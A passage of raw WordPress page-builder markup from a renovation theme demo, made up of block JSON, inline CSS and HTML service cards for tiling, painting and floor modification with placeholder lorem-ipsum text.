976px){\n\n.skt-blocks-block-46f78be9-957d-405f-b7f8-a348f80cff99.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: undefinedpx; }\n .skt-blocks-block-46f78be9-957d-405f-b7f8-a348f80cff99.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: undefinedpx !important; }\n .skt-blocks-block-46f78be9-957d-405f-b7f8-a348f80cff99 .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n\n@media only screen and (max-width: 767px){\n .skt-blocks-block-46f78be9-957d-405f-b7f8-a348f80cff99.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: undefinedpx; }\n .skt-blocks-block-46f78be9-957d-405f-b7f8-a348f80cff99.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: undefinedpx !important; }\n .skt-blocks-block-46f78be9-957d-405f-b7f8-a348f80cff99 .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n</style><style type=\"text/css\"> .skt-blocks-block-46f78be9-957d-405f-b7f8-a348f80cff99.skt-blocks-infobox__content-wrap {\n text-align: center; }\n</style><div class=\"skt-blocks-infobox__outer-wrap responsive-blocks-block-team\" style=\"border-width:1px;background-color:rgba(255, 255, 255, 1);padding:0;border-style:none;box-shadow:0px 0px   undefined \"><div class=\"skt-blocks-block-46f78be9-957d-405f-b7f8-a348f80cff99 skt-blocks-infobox__content-wrap skt-blocks-infobox skt-blocks-infobox-has-image skt-blocks-infobox-icon-above-title skt-blocks-infobox-image-valign-top skt-blocks-infobox-enable-border-radius \"><div class=\"skt-blocks-ifb-left-right-wrap\"><div class=\"skt-blocks-ifb-content\"><div class=\"skt-blocks-ifb-image-icon-content skt-blocks-ifb-imgicon-wrap\" style=\"margin-bottom:35px;margin-top:0;margin-left:0;margin-right:0\"><div class=\"skt-blocks-ifb-image\"><div class=\"skt-blocks-ifb-image-content\"><img class=\"\" src=\"https://cteisys.com/wp-content/uploads/2021/05/services-img2.jpg\" alt=\"\" style=\"border-color:#333;border-radius:0;border-width:2px;border-style:none;box-shadow:0px 0px   undefined \"/></div></div></div><div class=\"skt-blocks-ifb-title-wrap\"><h3 class=\"skt-blocks-ifb-title\" style=\"color:#303030;font-weight:700;font-family:Poppins;margin-bottom:20px\">Tiling</h3></div><div class=\"skt-blocks-ifb-text-wrap\"><p class=\"skt-blocks-ifb-desc\" style=\"color:#494848;font-family:Poppins;font-weight:400;margin-bottom:30px\">Posuere tellus imperdiet facilisis. Curabitur vaucibusy.</p><div class=\"skt-blocks-ifb-cta skt-blocks-infobox-cta-link-style\"><a href=\"https://sktperfectdemo.com/themepack/gbrenovate/services/tiling/\" target=\"_self\" class=\"skt-blocks-infobox-cta-link\" rel=\"noopener noreferrer\" style=\"color:#303030;padding-top:10px;padding-bottom:10px;padding-left:14px;padding-right:14px\"><span class=\"skt-blocks-inline-editing\" style=\"color:#303030\">Read More</span></a></div></div></div></div></div></div>\n<!-- /wp:skt-blocks/info-block --></div></div></div>\n<!-- /wp:skt-blocks/column -->\n\n<!-- wp:skt-blocks/column {\"topPadding\":50,\"bottomPadding\":50,\"leftPadding\":45,\"rightPadding\":30,\"leftMargin\":15,\"rightMargin\":15,\"topPaddingTablet\":30,\"bottomPaddingTablet\":30,\"leftPaddingTablet\":30,\"rightPaddingTablet\":30,\"leftMarginTablet\":10,\"rightMarginTablet\":10,\"topPaddingMobile\":50,\"bottomPaddingMobile\":50,\"leftPaddingMobile\":45,\"rightPaddingMobile\":30,\"bottomMarginMobile\":2,\"blockId\":\"726b9dd2-2c08-402d-b70f-e184ed0c21fc\",\"opacity\":100,\"backgroundType\":\"color\",\"backgroundColor\":\"#ffffff\"} -->\n<style type=\"text/css\"> .block-726b9dd2-2c08-402d-b70f-e184ed0c21fc .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-726b9dd2-2c08-402d-b70f-e184ed0c21fc .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-726b9dd2-2c08-402d-b70f-e184ed0c21fc .skt-blocks-block-column{\n padding-top: 50px; padding-bottom: 50px; padding-left: 45px; padding-right: 30px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: 15px; margin-right: 15px; }\n}\n @media only screen and (max-width: 976px){\n .block-726b9dd2-2c08-402d-b70f-e184ed0c21fc .skt-blocks-block-column{\n padding-top: 30px; padding-bottom: 30px; padding-left: 30px; padding-right: 30px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: 10px; margin-right: 10px; }\n}\n @media only screen and (max-width: 767px){\n .block-726b9dd2-2c08-402d-b70f-e184ed0c21fc .skt-blocks-block-column{\n padding-top: 50px; padding-bottom: 50px; padding-left: 45px; padding-right: 30px; margin-top: undefinedpx; margin-bottom: 2px; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-726b9dd2-2c08-402d-b70f-e184ed0c21fc\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none;background-color:rgba(255, 255, 255, 1)\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/info-block {\"resheadingColor\":\"#303030\",\"ressubheadingColor\":\"#494848\",\"resheadFontFamily\":\"Poppins\",\"ressubHeadFontFamily\":\"Poppins\",\"resheadFontSize\":25,\"ressubHeadFontSize\":17,\"ressubHeadFontWeight\":\"400\",\"resheadSpace\":20,\"ressubHeadSpace\":30,\"source_type\":\"image\",\"resseperatorStyle\":\"none\",\"resctaType\":\"text\",\"resctaLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/services/painting/\",\"resctaLinkColor\":\"#303030\",\"iconTopMargin\":0,\"iconBottomMargin\":35,\"iconImage\":{\"id\":29,\"title\":\"services-img3\",\"filename\":\"services-img3.jpg\",\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/services-img3.jpg\",\"link\":\"https://sktperfectdemo.com/themepack/gbrenovate/services-img3/\",\"alt\":\"\",\"author\":\"1\",\"description\":\"\",\"caption\":\"\",\"name\":\"services-img3\",\"status\":\"inherit\",\"uploadedTo\":0,\"date\":\"2021-05-25T13:48:37.000Z\",\"modified\":\"2021-05-25T13:48:37.000Z\",\"menuOrder\":0,\"mime\":\"image/jpeg\",\"type\":\"image\",\"subtype\":\"jpeg\",\"icon\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-includes/images/media/default.png\",\"dateFormatted\":\"May 25, 2021\",\"nonces\":{\"update\":\"1df582acb1\",\"delete\":\"75ddbb8dd1\",\"edit\":\"b8f84e66c7\"},\"editLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=29u0026action=edit\",\"meta\":false,\"authorName\":\"gbrenovation\",\"authorLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/profile.php\",\"filesizeInBytes\":2302,\"filesizeHumanReadable\":\"2 KB\",\"context\":\"\",\"height\":67,\"width\":59,\"orientation\":\"portrait\",\"sizes\":{\"full\":{\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/services-img3.jpg\",\"height\":67,\"width\":59,\"orientation\":\"portrait\"}},\"compat\":{\"item\":\"\",\"meta\":\"\"}},\"imageWidth\":59,\"resshowPrefix\":false,\"counterId\":\"0873ea34-7706-4a98-aca7-fb1d4c1bd7dc\"} -->\n<style type=\"text/css\"> .skt-blocks-block-0873ea34-7706-4a98-aca7-fb1d4c1bd7dc .skt-blocks-ifb-cta-button {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-0873ea34-7706-4a98-aca7-fb1d4c1bd7dc .skt-blocks-ifb-cta-button .skt-blocks-inline-editing{\n color: #333; }\n .skt-blocks-block-0873ea34-7706-4a98-aca7-fb1d4c1bd7dc .skt-blocks-ifb-cta-button:hover {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-0873ea34-7706-4a98-aca7-fb1d4c1bd7dc .skt-blocks-ifb-cta-button .skt-blocks-inline-editing:hover{\n color: #333; }\n .skt-blocks-block-0873ea34-7706-4a98-aca7-fb1d4c1bd7dc .skt-blocks-ifb-icon svg{\n fill: #3a3a3a; }\n .skt-blocks-block-0873ea34-7706-4a98-aca7-fb1d4c1bd7dc .skt-blocks-ifb-icon:hover svg{\n fill: #3a3a3a; }\n .skt-blocks-block-0873ea34-7706-4a98-aca7-fb1d4c1bd7dc .skt-blocks-ifb-image-content img{\n opacity: 1 }\n</style><style type=\"text/css\">\n@media only screen and (min-width: 976px){\n\n.skt-blocks-block-0873ea34-7706-4a98-aca7-fb1d4c1bd7dc.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 25px !important; }\n .skt-blocks-block-0873ea34-7706-4a98-aca7-fb1d4c1bd7dc.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 17px !important; }\n .skt-blocks-block-0873ea34-7706-4a98-aca7-fb1d4c1bd7dc .skt-blocks-ifb-image-content img {\n width: 59px; }\n}\n\n@media only screen and (max-width: 976px){\n\n.skt-blocks-block-0873ea34-7706-4a98-aca7-fb1d4c1bd7dc.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: undefinedpx; }\n .skt-blocks-block-0873ea34-7706-4a98-aca7-fb1d4c1bd7dc.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: undefinedpx !important; }\n .skt-blocks-block-0873ea34-7706-4a98-aca7-fb1d4c1bd7dc .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n\n@media only screen and (max-width: 767px){\n .skt-blocks-block-0873ea34-7706-4a98-aca7-fb1d4c1bd7dc.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: undefinedpx; }\n .skt-blocks-block-0873ea34-7706-4a98-aca7-fb1d4c1bd7dc.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: undefinedpx !important; }\n .skt-blocks-block-0873ea34-7706-4a98-aca7-fb1d4c1bd7dc .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n</style><style type=\"text/css\"> .skt-blocks-block-0873ea34-7706-4a98-aca7-fb1d4c1bd7dc.skt-blocks-infobox__content-wrap {\n text-align: center; }\n</style><div class=\"skt-blocks-infobox__outer-wrap responsive-blocks-block-team\" style=\"border-width:1px;background-color:rgba(255, 255, 255, 1);padding:0;border-style:none;box-shadow:0px 0px   undefined \"><div class=\"skt-blocks-block-0873ea34-7706-4a98-aca7-fb1d4c1bd7dc skt-blocks-infobox__content-wrap skt-blocks-infobox skt-blocks-infobox-has-image skt-blocks-infobox-icon-above-title skt-blocks-infobox-image-valign-top skt-blocks-infobox-enable-border-radius \"><div class=\"skt-blocks-ifb-left-right-wrap\"><div class=\"skt-blocks-ifb-content\"><div class=\"skt-blocks-ifb-image-icon-content skt-blocks-ifb-imgicon-wrap\" style=\"margin-bottom:35px;margin-top:0;margin-left:0;margin-right:0\"><div class=\"skt-blocks-ifb-image\"><div class=\"skt-blocks-ifb-image-content\"><img class=\"\" src=\"https://cteisys.com/wp-content/uploads/2021/05/services-img3.jpg\" alt=\"\" style=\"border-color:#333;border-radius:0;border-width:2px;border-style:none;box-shadow:0px 0px   undefined \"/></div></div></div><div class=\"skt-blocks-ifb-title-wrap\"><h3 class=\"skt-blocks-ifb-title\" style=\"color:#303030;font-weight:700;font-family:Poppins;margin-bottom:20px\">Painting</h3></div><div class=\"skt-blocks-ifb-text-wrap\"><p class=\"skt-blocks-ifb-desc\" style=\"color:#494848;font-family:Poppins;font-weight:400;margin-bottom:30px\">Posuere tellus imperdiet facilisis. Curabitur vaucibusy.</p><div class=\"skt-blocks-ifb-cta skt-blocks-infobox-cta-link-style\"><a href=\"https://sktperfectdemo.com/themepack/gbrenovate/services/painting/\" target=\"_self\" class=\"skt-blocks-infobox-cta-link\" rel=\"noopener noreferrer\" style=\"color:#303030;padding-top:10px;padding-bottom:10px;padding-left:14px;padding-right:14px\"><span class=\"skt-blocks-inline-editing\" style=\"color:#303030\">Read More</span></a></div></div></div></div></div></div>\n<!-- /wp:skt-blocks/info-block --></div></div></div>\n<!-- /wp:skt-blocks/column --></div></div></div></div>\n<!-- /wp:skt-blocks/advance-columns --></div></section></div>\n<!-- /wp:skt-blocks/section -->\n\n<!-- wp:skt-blocks/section {\"contentWidth\":\"full_width\",\"blockId\":\"a12cea8d-712a-4459-b2cf-bcaf4cd28aa2\",\"topPadding\":30,\"bottomPadding\":0,\"leftPadding\":0,\"rightPadding\":0,\"className\":\"gb-renovation-services\"} -->\n<div class=\"wp-block-skt-blocks-section gb-renovation-services skt-blocks-block-section-outer-wrap block-a12cea8d-712a-4459-b2cf-bcaf4cd28aa2 background-type-none alignundefined\" style=\"z-index:1;max-width:;margin-left:;margin-right:\"><style type=\"text/css\"> @media only screen and (max-width: 976px){\n .block-a12cea8d-712a-4459-b2cf-bcaf4cd28aa2 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 10px; padding-bottom: 10px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (max-width: 767px){\n .block-a12cea8d-712a-4459-b2cf-bcaf4cd28aa2 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 10px; padding-bottom: 10px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (min-width: 976px){\n .block-a12cea8d-712a-4459-b2cf-bcaf4cd28aa2 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 30px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; }\n}\n .block-a12cea8d-712a-4459-b2cf-bcaf4cd28aa2.skt-blocks-block-section-outer-wrap.background-type-image{\n background-image: linear-gradient(rgba(255, 255, 255, 0.2),rgba(255, 255, 255, 0.2)),url(undefined); background-position: center-center; background-attachment: scroll; background-repeat: no-repeat; background-size: cover; border-radius: 0px; }\n .block-a12cea8d-712a-4459-b2cf-bcaf4cd28aa2.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-color{\n background-color: rgba(255, 255, 255, 0.2); }\n .block-a12cea8d-712a-4459-b2cf-bcaf4cd28aa2.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0.2) 0%, rgba(255, 255, 255, 0.2) 100%); }\n .block-a12cea8d-712a-4459-b2cf-bcaf4cd28aa2.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0.2) 0%, rgba(255, 255, 255, 0.2) 100%); }\n .block-a12cea8d-712a-4459-b2cf-bcaf4cd28aa2.background-type-video .skt-blocks-block-section {\n background-color: rgba(255, 255, 255, 0.2); }\n</style><style type=\"text/css\"> .block-a12cea8d-712a-4459-b2cf-bcaf4cd28aa2 .responsive-section-inner-wrap {\n max-width : 100%; }\n @media only screen and (min-width: 976px){\n .block-a12cea8d-712a-4459-b2cf-bcaf4cd28aa2 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-a12cea8d-712a-4459-b2cf-bcaf4cd28aa2.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 976px){\n .block-a12cea8d-712a-4459-b2cf-bcaf4cd28aa2 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-a12cea8d-712a-4459-b2cf-bcaf4cd28aa2.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 767px){\n .block-a12cea8d-712a-4459-b2cf-bcaf4cd28aa2 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-a12cea8d-712a-4459-b2cf-bcaf4cd28aa2.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n</style><section class=\"responsive-section-wrap skt-blocks-block-section overlay-type-color linear\" style=\"border-width:1px;border-style:none;border-radius:0;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-section-inner-wrap\" style=\"z-index:1\"><!-- wp:skt-blocks/advance-columns {\"columns\":3,\"topPadding\":0,\"bottomPadding\":0,\"leftPadding\":0,\"rightPadding\":0,\"opacity\":0,\"blockId\":\"0e124042-d205-4388-bbab-642fedafff11\"} -->\n<style type=\"text/css\"> .block-0e124042-d205-4388-bbab-642fedafff11 .skt-blocks-block-columns.overlay-type-color{\n background-color: rgba(255, 255, 255, 0); }\n .block-0e124042-d205-4388-bbab-642fedafff11 .skt-blocks-block-columns.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-0e124042-d205-4388-bbab-642fedafff11 .skt-blocks-block-columns.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-0e124042-d205-4388-bbab-642fedafff11 .skt-blocks-block-column{\n min-height: ; align-items: flex-start; }\n @media only screen and (min-width: 976px){\n .block-0e124042-d205-4388-bbab-642fedafff11 .skt-blocks-block-columns{\n padding-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; margin-top: 0px; margin-bottom: 0px; }\n}\n @media only screen and (max-width: 976px){\n .block-0e124042-d205-4388-bbab-642fedafff11 .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-0e124042-d205-4388-bbab-642fedafff11 .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n</style><div class=\"block-0e124042-d205-4388-bbab-642fedafff11 skt-blocks-advanced-column-outer-wrap undefined\" style=\"z-index:1\"><div class=\"skt-blocks-advanced-column alignundefined\"><div class=\"responsive-columns-wrap skt-blocks-block-columns responsive-columns__gap-default responsive-columns__stack-mobile responsive-columns__content-width-theme overlay-type-color linear\" style=\"text-align:left;border-width:1px;border-style:none;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-columns-inner-wrap responsive-columns-columns-3\" style=\"max-width:100%\"><!-- wp:skt-blocks/column {\"topPadding\":50,\"bottomPadding\":50,\"leftPadding\":45,\"rightPadding\":30,\"leftMargin\":15,\"rightMargin\":15,\"topPaddingTablet\":30,\"bottomPaddingTablet\":30,\"leftPaddingTablet\":30,\"rightPaddingTablet\":30,\"leftMarginTablet\":10,\"rightMarginTablet\":10,\"topPaddingMobile\":50,\"bottomPaddingMobile\":50,\"leftPaddingMobile\":45,\"rightPaddingMobile\":30,\"bottomMarginMobile\":20,\"blockId\":\"4489ec69-9114-4ceb-8836-b89abbc88c47\",\"blockBorderRadius\":5,\"opacity\":100,\"backgroundType\":\"color\",\"backgroundColor\":\"#ffffff\"} -->\n<style type=\"text/css\"> .block-4489ec69-9114-4ceb-8836-b89abbc88c47 .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-4489ec69-9114-4ceb-8836-b89abbc88c47 .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-4489ec69-9114-4ceb-8836-b89abbc88c47 .skt-blocks-block-column{\n padding-top: 50px; padding-bottom: 50px; padding-left: 45px; padding-right: 30px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: 15px; margin-right: 15px; }\n}\n @media only screen and (max-width: 976px){\n .block-4489ec69-9114-4ceb-8836-b89abbc88c47 .skt-blocks-block-column{\n padding-top: 30px; padding-bottom: 30px; padding-left: 30px; padding-right: 30px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: 10px; margin-right: 10px; }\n}\n @media only screen and (max-width: 767px){\n .block-4489ec69-9114-4ceb-8836-b89abbc88c47 .skt-blocks-block-column{\n padding-top: 50px; padding-bottom: 50px; padding-left: 45px; padding-right: 30px; margin-top: undefinedpx; margin-bottom: 20px; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-4489ec69-9114-4ceb-8836-b89abbc88c47\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none;border-radius:5px;background-color:rgba(255, 255, 255, 1)\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/info-block {\"resheadingColor\":\"#303030\",\"ressubheadingColor\":\"#494848\",\"resheadingTag\":\"h4\",\"resheadFontFamily\":\"Poppins\",\"ressubHeadFontFamily\":\"Poppins\",\"resheadFontSize\":25,\"ressubHeadFontSize\":17,\"ressubHeadFontWeight\":\"400\",\"resheadSpace\":20,\"ressubHeadSpace\":30,\"source_type\":\"image\",\"resseperatorStyle\":\"none\",\"resctaType\":\"text\",\"resctaLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/floor-modification/\",\"iconTopMargin\":0,\"iconBottomMargin\":35,\"iconImage\":{\"uploading\":false,\"date\":\"2021-05-28T05:39:15.000Z\",\"filename\":\"floor-modification.jpg\",\"menuOrder\":0,\"uploadedTo\":7,\"type\":\"image\",\"subtype\":\"jpeg\",\"alt\":\"\",\"title\":\"floor-modification\",\"caption\":\"\",\"description\":\"\",\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/floor-modification.jpg\",\"id\":258,\"link\":\"https://sktperfectdemo.com/themepack/gbrenovate/home/floor-modification/\",\"author\":\"1\",\"name\":\"floor-modification\",\"status\":\"inherit\",\"modified\":\"2021-05-28T05:39:15.000Z\",\"mime\":\"image/jpeg\",\"icon\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-includes/images/media/default.png\",\"dateFormatted\":\"May 28, 2021\",\"nonces\":{\"update\":\"dc1b7f19b6\",\"delete\":\"1f29bf8951\",\"edit\":\"ed86f5af8b\"},\"editLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=258u0026action=edit\",\"meta\":false,\"authorName\":\"gbrenovation\",\"authorLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/profile.php\",\"uploadedToTitle\":\"Home\",\"uploadedToLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=7u0026action=edit\",\"filesizeInBytes\":9306,\"filesizeHumanReadable\":\"9 KB\",\"context\":\"\",\"height\":66,\"width\":111,\"orientation\":\"landscape\",\"sizes\":{\"full\":{\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/floor-modification.jpg\",\"height\":66,\"width\":111,\"orientation\":\"landscape\"}},\"compat\":{\"item\":\"\",\"meta\":\"\"}},\"imageWidth\":111,\"resshowPrefix\":false,\"counterId\":\"32d1bc82-ef5a-4ca9-b067-6248c321704c\"} -->\n<style type=\"text/css\"> .skt-blocks-block-32d1bc82-ef5a-4ca9-b067-6248c321704c .skt-blocks-ifb-cta-button {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-32d1bc82-ef5a-4ca9-b067-6248c321704c .skt-blocks-ifb-cta-button .skt-blocks-inline-editing{\n color: #333; }\n .skt-blocks-block-32d1bc82-ef5a-4ca9-b067-6248c321704c .skt-blocks-ifb-cta-button:hover {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-32d1bc82-ef5a-4ca9-b067-6248c321704c .skt-blocks-ifb-cta-button .skt-blocks-inline-editing:hover{\n color: #333; }\n .skt-blocks-block-32d1bc82-ef5a-4ca9-b067-6248c321704c .skt-blocks-ifb-icon svg{\n fill: #3a3a3a; }\n .skt-blocks-block-32d1bc82-ef5a-4ca9-b067-6248c321704c .skt-blocks-ifb-icon:hover svg{\n fill: #3a3a3a; }\n .skt-blocks-block-32d1bc82-ef5a-4ca9-b067-6248c321704c .skt-blocks-ifb-image-content img{\n opacity: 1 }\n</style><style type=\"text/css\">\n@media only screen and (min-width: 976px){\n\n.skt-blocks-block-32d1bc82-ef5a-4ca9-b067-6248c321704c.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 25px !important; }\n .skt-blocks-block-32d1bc82-ef5a-4ca9-b067-6248c321704c.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 17px !important; }\n .skt-blocks-block-32d1bc82-ef5a-4ca9-b067-6248c321704c .skt-blocks-ifb-image-content img {\n width: 111px; }\n}\n\n@media only screen and (max-width: 976px){\n\n.skt-blocks-block-32d1bc82-ef5a-4ca9-b067-6248c321704c.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: undefinedpx; }\n .skt-blocks-block-32d1bc82-ef5a-4ca9-b067-6248c321704c.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: undefinedpx !important; }\n .skt-blocks-block-32d1bc82-ef5a-4ca9-b067-6248c321704c .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n\n@media only screen and (max-width: 767px){\n .skt-blocks-block-32d1bc82-ef5a-4ca9-b067-6248c321704c.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: undefinedpx; }\n .skt-blocks-block-32d1bc82-ef5a-4ca9-b067-6248c321704c.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: undefinedpx !important; }\n .skt-blocks-block-32d1bc82-ef5a-4ca9-b067-6248c321704c .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n</style><style type=\"text/css\"> .skt-blocks-block-32d1bc82-ef5a-4ca9-b067-6248c321704c.skt-blocks-infobox__content-wrap {\n text-align: center; }\n</style><div class=\"skt-blocks-infobox__outer-wrap responsive-blocks-block-team\" style=\"border-width:1px;background-color:rgba(255, 255, 255, 1);padding:0;border-style:none;box-shadow:0px 0px   undefined \"><div class=\"skt-blocks-block-32d1bc82-ef5a-4ca9-b067-6248c321704c skt-blocks-infobox__content-wrap skt-blocks-infobox skt-blocks-infobox-has-image skt-blocks-infobox-icon-above-title skt-blocks-infobox-image-valign-top skt-blocks-infobox-enable-border-radius \"><div class=\"skt-blocks-ifb-left-right-wrap\"><div class=\"skt-blocks-ifb-content\"><div class=\"skt-blocks-ifb-image-icon-content skt-blocks-ifb-imgicon-wrap\" style=\"margin-bottom:35px;margin-top:0;margin-left:0;margin-right:0\"><div class=\"skt-blocks-ifb-image\"><div class=\"skt-blocks-ifb-image-content\"><img class=\"\" src=\"https://cteisys.com/wp-content/uploads/2021/05/floor-modification.jpg\" alt=\"\" style=\"border-color:#333;border-radius:0;border-width:2px;border-style:none;box-shadow:0px 0px   undefined \"/></div></div></div><div class=\"skt-blocks-ifb-title-wrap\"><h4 class=\"skt-blocks-ifb-title\" style=\"color:#303030;font-weight:700;font-family:Poppins;margin-bottom:20px\">Floor Modification</h4></div><div class=\"skt-blocks-ifb-text-wrap\"><p class=\"skt-blocks-ifb-desc\" style=\"color:#494848;font-family:Poppins;font-weight:400;margin-bottom:30px\">Posuere tellus imperdiet facilisis.<br>Curabitur vaucibusy.</p><div class=\"skt-blocks-ifb-cta skt-blocks-infobox-cta-link-style\"><a href=\"https://sktperfectdemo.com/themepack/gbrenovate/floor-modification/\" target=\"_self\" class=\"skt-blocks-infobox-cta-link\" rel=\"noopener noreferrer\" style=\"color:#333;padding-top:10px;padding-bottom:10px;padding-left:14px;padding-right:14px\"><span class=\"skt-blocks-inline-editing\" style=\"color:#333\">Read More</span></a></div></div></div></div></div></div>\n<!-- /wp:skt-blocks/info-block --></div></div></div>\n<!-- /wp:skt-blocks/column -->\n\n<!-- wp:skt-blocks/column {\"topPadding\":50,\"bottomPadding\":50,\"leftPadding\":45,\"rightPadding\":30,\"leftMargin\":15,\"rightMargin\":15,\"topPaddingTablet\":30,\"bottomPaddingTablet\":30,\"leftPaddingTablet\":30,\"rightPaddingTablet\":30,\"leftMarginTablet\":10,\"rightMarginTablet\":10,\"topPaddingMobile\":50,\"bottomPaddingMobile\":50,\"leftPaddingMobile\":45,\"rightPaddingMobile\":30,\"bottomMarginMobile\":20,\"blockId\":\"7acb5b00-e12a-4e09-b190-fd5d15bfa0e8\",\"opacity\":100,\"backgroundType\":\"color\",\"backgroundColor\":\"#ffffff\"} -->\n<style type=\"text/css\"> .block-7acb5b00-e12a-4e09-b190-fd5d15bfa0e8 .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-7acb5b00-e12a-4e09-b190-fd5d15bfa0e8 .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-7acb5b00-e12a-4e09-b190-fd5d15bfa0e8 .skt-blocks-block-column{\n padding-top: 50px; padding-bottom: 50px; padding-left: 45px; padding-right: 30px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: 15px; margin-right: 15px; }\n}\n @media only screen and (max-width: 976px){\n .block-7acb5b00-e12a-4e09-b190-fd5d15bfa0e8 .skt-blocks-block-column{\n padding-top: 30px; padding-bottom: 30px; padding-left: 30px; padding-right: 30px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: 10px; margin-right: 10px; }\n}\n @media only screen and (max-width: 767px){\n .block-7acb5b00-e12a-4e09-b190-fd5d15bfa0e8 .skt-blocks-block-column{\n padding-top: 50px; padding-bottom: 50px; padding-left: 45px; padding-right: 30px; margin-top: undefinedpx; margin-bottom: 20px; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child 